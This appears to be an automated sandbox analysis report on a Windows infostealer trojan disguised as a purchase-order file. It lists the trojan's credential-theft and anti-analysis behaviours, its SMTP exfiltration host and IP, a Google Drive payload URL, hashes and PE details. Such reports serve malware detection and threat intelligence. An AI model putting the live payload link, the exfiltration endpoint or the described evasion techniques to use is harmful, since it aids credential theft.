          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1373 Sample: LISTA DE PEDIDO DE COMPRA.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 38 mail.reyesyasociados.com 2->38 40 googlehosted.l.googleusercontent.com 2->40 42 2 other IPs or domains 2->42 50 Found malware configuration 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: RegAsm connects to smtp port 2->54 56 2 other signatures 2->56 8 LISTA DE PEDIDO DE COMPRA.exe 1 2->8         started        11 mpam-1ba0cab.exe 4 2->11         started        14 wevtutil.exe 8 1 2->14         started        16 wevtutil.exe 1 2->16         started        signatures3 process4 file5 70 Writes to foreign memory regions 8->70 72 Tries to detect Any.run 8->72 74 Hides threads from debuggers 8->74 18 RegAsm.exe 9 8->18         started        22 RegAsm.exe 8->22         started        32 C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+ 11->32 dropped 34 C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+ 11->34 dropped 36 C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+ 11->36 dropped 24 MpSigStub.exe 1 11->24         started        26 conhost.exe 14->26         started        28 conhost.exe 16->28         started        signatures6 process7 dnsIp8 44 mail.reyesyasociados.com 109.169.39.245, 49778, 587 IOMART-ASGB United Kingdom 18->44 46 googlehosted.l.googleusercontent.com 142.250.184.193, 443, 49770 GOOGLEUS United States 18->46 48 drive.google.com 142.250.185.174, 443, 49768 GOOGLEUS United States 18->48 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->58 60 Tries to steal Mail credentials (via file access) 18->60 62 Tries to harvest and steal ftp login credentials 18->62 68 3 other signatures 18->68 30 conhost.exe 18->30         started        64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->64 66 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 22->66 signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LISTA DE PEDIDO DE COMPRA.exe16%ReversingLabsWin32.Trojan.Mucc

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://sectigo.com/CPS00%VirustotalBrowse
          https://sectigo.com/CPS00%Avira URL Cloudsafe
          http://mail.reyesyasociados.com0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://DXdVhu.com0%Avira URL Cloudsafe
          https://f9WVaLZTFfU.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          142.250.185.174
          truefalse
            high
            googlehosted.l.googleusercontent.com
            142.250.184.193
            truefalse
              high
              mail.reyesyasociados.com
              109.169.39.245
              truetrue
                unknown
                doc-0c-50-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSRegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sectigo.com/CPS0RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://mail.reyesyasociados.comRegAsm.exe, 0000000A.00000002.7792807129.000000001DC2A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-0c-50-docs.googleusercontent.com/RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmpfalse
                        high
                        https://doc-0c-50-docs.googleusercontent.com/om~;RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpfalse
                          high
                          https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmpfalse
                            high
                            http://DXdVhu.comRegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://f9WVaLZTFfU.comRegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.4120444145.0000000000EB1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hRegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpfalse
                              high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              109.169.39.245
                              mail.reyesyasociados.comUnited Kingdom
                              20860IOMART-ASGBtrue
                              142.250.185.174
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              142.250.184.193
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:1373
                              Start date:27.09.2021
                              Start time:19:11:55
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 11s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:LISTA DE PEDIDO DE COMPRA.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:32
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@13/5@3/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 56%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.54.89.106, 40.125.122.151, 52.152.108.96, 20.199.120.151, 20.50.102.62, 20.199.120.182, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.199.120.85, 20.54.122.82
                              • Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, arc.trafficmanager.net, slscr.update.microsoft.com.akadns.net, definitionupdates.microsoft.com, client.wns.windows.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, go.microsoft.com.edgekey.net, www.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              19:14:48API Interceptor2605x Sleep call for process: RegAsm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              109.169.39.245Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                  BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                    Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      mail.reyesyasociados.comDokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                      • 109.169.39.245

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      IOMART-ASGBDokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      4czqYWTUq8Get hashmaliciousBrowse
                                      • 217.147.86.101
                                      b8uTZxALDhGet hashmaliciousBrowse
                                      • 176.56.205.97
                                      XMae11M5ygGet hashmaliciousBrowse
                                      • 109.75.167.7
                                      BESTPREIS-ANFRAGE.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      shinto.x86Get hashmaliciousBrowse
                                      • 217.194.212.165
                                      BESTE PRIJS AANVRAAG.exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      Zapytanie ofertowe (Zamel sp. z o.o.).exeGet hashmaliciousBrowse
                                      • 109.169.39.245
                                      QkAgFhbO4a.exeGet hashmaliciousBrowse
                                      • 109.169.33.163
                                      ac1khvFT2V.exeGet hashmaliciousBrowse
                                      • 78.129.165.118
                                      Colis_____FR6627222019J01.vbsGet hashmaliciousBrowse
                                      • 5.77.41.150
                                      DriverPack-17-Online_749652650.1631058953__eqiqpdyx4midqk9.exeGet hashmaliciousBrowse
                                      • 87.117.239.150
                                      IcdLXZ5hGEGet hashmaliciousBrowse
                                      • 176.56.205.122
                                      xOMeOjIk7V.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      KW3VrbX3Av.exeGet hashmaliciousBrowse
                                      • 217.194.215.58
                                      EcyvrSp565.exeGet hashmaliciousBrowse
                                      • 217.194.215.58
                                      vigmCKdmz9Get hashmaliciousBrowse
                                      • 31.216.57.33
                                      T9V927Bbvx.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      fmPwEX2Lc1.exeGet hashmaliciousBrowse
                                      • 78.129.249.105
                                      2uHa4FhlY1.exeGet hashmaliciousBrowse
                                      • 78.129.249.105

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      37f463bf4616ecd445d4a1937da06e190zK7HxQE65.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709212890.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      PO-003785GMHN.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      NH8Oxi5PZo.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      FDVCyigTWH.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      PO-003785GMHN.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      cYKFZFK0Rg.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      svchost.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      T6zZFfRLqs.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      nY67wl47QZ.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      OfE705GyPZ.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      W7fb1ECIQA.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      R9LbEnIk0s.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      payment confirmation.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      recital-239880844.xlsGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      Unreal.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193
                                      Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                      • 142.250.185.174
                                      • 142.250.184.193

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeUnreal.exeGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
                                        Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):803176
                                        Entropy (8bit):6.37118649960636
                                        Encrypted:false
                                        SSDEEP:24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
                                        MD5:01F92DC7A766FF783AE7AF40FD0334FB
                                        SHA1:45D7B8E98E22F939ED0083FE31204CAA9A72FA76
                                        SHA-256:FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
                                        SHA-512:BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Unreal.exe, Detection: malicious, Browse
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................
                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm
                                        Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe
                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):7757248
                                        Entropy (8bit):7.999013501574166
                                        Encrypted:true
                                        SSDEEP:98304:4iM4UyTSwCNfDceiD8z/olziUjuRd/mQKWt3LTZGNON7vAerhfm+EznxMs4Y8o10:a/VlD/8tjC/95GNFUhfCMspNNTrU
                                        MD5:4B1706881C1432AB95AE4627A8461836
                                        SHA1:733E0C23C6B4FD30EDD4A254193E7F28DD6C05BA
                                        SHA-256:FBFFBA90A086FC69FCCCC451F5C01B26948555E89F9102129F990793ED95FAF8
                                        SHA-512:9ED3CCE43C1944CE3D32C0813C4A7393A8C31025A7E58A3E41A6CFB4DA938BFB2C1AECB2D0EF5BEA207127F995F9F4EFBE1C8A702810D3073EDE40B2D1910B80
                                        Malicious:false
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." .........:v..............................................`v.....{|v...`.......................................................... ...6v..........<v..!...........................................................................................rdata..p...........................@..@.rsrc....6v.. ...8v.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..H5v..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm
                                        Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe
                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                        Category:modified
                                        Size (bytes):5022136
                                        Entropy (8bit):7.997782905180681
                                        Encrypted:true
                                        SSDEEP:98304:of1kESuax9rR7hpgVMFMcDxBzZTdpJ21QYD1vU4PUERRizRytd2Lbw7:okEVWTNTDx3rYRvXliceQ7
                                        MD5:BC34E855F085470BB9D748DF096CAB00
                                        SHA1:D89B1967D2AD60608A8EBF8E7CAE60F19E5D781D
                                        SHA-256:80A20D4FD03088B1582376B66F97A13A2C99A7C2F3862E9376E821A4E44438D6
                                        SHA-512:69773D4CED7219C669C526E85503C333B3818B8268CDF78FC79E50AE95E2CAC9B92254185BDD459F22DA0F97535C07B449F50C10942866DA96D86DD6739BDD7E
                                        Malicious:false
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." .........~L...............................................L......%M...`.......................................................... ...zL...........L..!...........................................................................................rdata..p...........................@..@.rsrc....zL.. ...|L.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...yL..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log
                                        Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe
                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):6854
                                        Entropy (8bit):3.553763949634768
                                        Encrypted:false
                                        SSDEEP:96:BNjBiBYmA2KxoZvHoBYEqQCzrf+yQKz5fdeojfYsF7:7jJD2Kx0HoSjrtjBdeofJ
                                        MD5:405D83782043C1C978A139D893F96AB8
                                        SHA1:5B418987A5D89E9796F6473E9F30897B3F6DDA61
                                        SHA-256:B653D1246B9D54FAB04B360A67C46765301326F093F748C68EFF56E8F0058E11
                                        SHA-512:19CF02DA558253987738299351763F46B3B4A3864D92F569EECDCEB8EAD0DDEAF0E5E82DBABDF3FDADDE6CB90AFE9E1ABD0012E9EF126DD6D24261DEEF9B5238
                                        Malicious:false
                                        Preview: ..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.0.9.-.2.7. .1.8.:.1.9.:.3.2.Z.....P.r.o.c.e.s.s.:. .1.e.c.8...1.d.7.b.3.c.c.3.7.9.6.1.a.4.4.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.4.9...1.5.0.3...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.1.b.a.0.c.a.b...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.
                                        \Device\ConDrv
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):30
                                        Entropy (8bit):3.964735178725505
                                        Encrypted:false
                                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                        MD5:9F754B47B351EF0FC32527B541420595
                                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                        Malicious:false
                                        Preview: NordVPN directory not found!..

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):5.784829159935832
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:LISTA DE PEDIDO DE COMPRA.exe
                                        File size:90112
                                        MD5:943986d4cb51d4cc29946aa7914dbc5b
                                        SHA1:cce8ec41fe0fabda407eaa5b8b9efc81168c5e5c
                                        SHA256:47d8b37351178ed6a40a269f3f42eb23fa0780a9a93098439275f7e66897a924
                                        SHA512:40b1ba76af58ec4c1983c9bc7caafffc82ce18b781e7a23b1449768892f28eb768f5a6e2f999b0c9d409b8738446bfa43f42d1de277bf0e838becc775975b3c2
                                        SSDEEP:1536:tyC4s0dtppkkhU0Ips6YHvzU9KKP/J0h6GuR:t4sWfks/KPBsLuR
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......Q.................0... ...............@....@........

                                        File Icon

                                        Icon Hash:821ca88c8e8c8c00

                                        Static PE Info

                                        General

                                        Entrypoint:0x4012c8
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x5194CAB0 [Thu May 16 12:01:52 2013 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                        Entrypoint Preview

                                        Instruction
                                        push 00410038h
                                        call 00007FAE58A73BC3h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        cmp byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jnc 00007FAE58A73C4Ah
                                        sub eax, 5F66C4CBh
                                        dec ebx
                                        cdq
                                        jnle 00007FAE58A73B80h
                                        sub eax, 002A6C06h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx+ebp*2+73h], al
                                        jne 00007FAE58A73C35h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        dec esp
                                        xor dword ptr [eax], eax
                                        cmp byte ptr [ecx+4A1D826Eh], dl
                                        add al, 86h
                                        inc edx
                                        mov eax, ABEFDC15h
                                        arpl word ptr [ecx], dx
                                        stc
                                        sub byte ptr [edi], al
                                        mov ecx, 465E4950h
                                        dec esi
                                        mov al, 85h
                                        mov byte ptr [edx+20992AA1h], bh
                                        cmp cl, byte ptr [edi-53h]
                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                        or al, 00h
                                        stosb
                                        add byte ptr [eax-2Dh], ah
                                        xchg eax, ebx
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        into
                                        jmp far 0000h : 018E0000h
                                        add byte ptr [edi], al
                                        add byte ptr [ebp+79h], cl
                                        je 00007FAE58A73C41h
                                        insb
                                        outsd
                                        add byte ptr [di], cl
                                        add dword ptr [edi], eax
                                        add byte ptr [ebp+6Fh], ch
                                        jnc 00007FAE58A73C47h
                                        outsd
                                        add byte ptr fs:[ecx], bl
                                        add dword ptr [eax], eax
                                        inc edx
                                        add byte ptr [edx], ah
                                        add esp, dword ptr [ebx]

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x137240x28.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x548.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
